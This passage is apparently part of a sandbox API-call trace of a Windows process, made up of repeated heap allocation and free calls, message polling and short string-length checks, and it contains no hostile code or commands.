lpMsg=0x8cf228) returned 0 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0225.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0225.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0225.598] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0225.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0225.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0225.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0225.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0225.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0225.599] lstrlenW (lpString="75") returned 2 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0225.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0225.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0225.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.601] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.601] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0225.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0225.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0225.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0225.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0225.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.602] lstrlenW (lpString="73") returned 2 [0225.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0225.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0225.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.603] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.603] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0225.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0225.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0225.604] lstrlenW (lpString="65") returned 2 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.605] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.605] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0225.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0225.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0225.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0225.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0225.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0225.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0225.606] lstrlenW (lpString="72") returned 2 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0225.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0225.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.607] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.607] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0225.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0225.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0225.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0225.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0225.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.608] lstrlenW (lpString="33") returned 2 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0225.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0225.608] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, 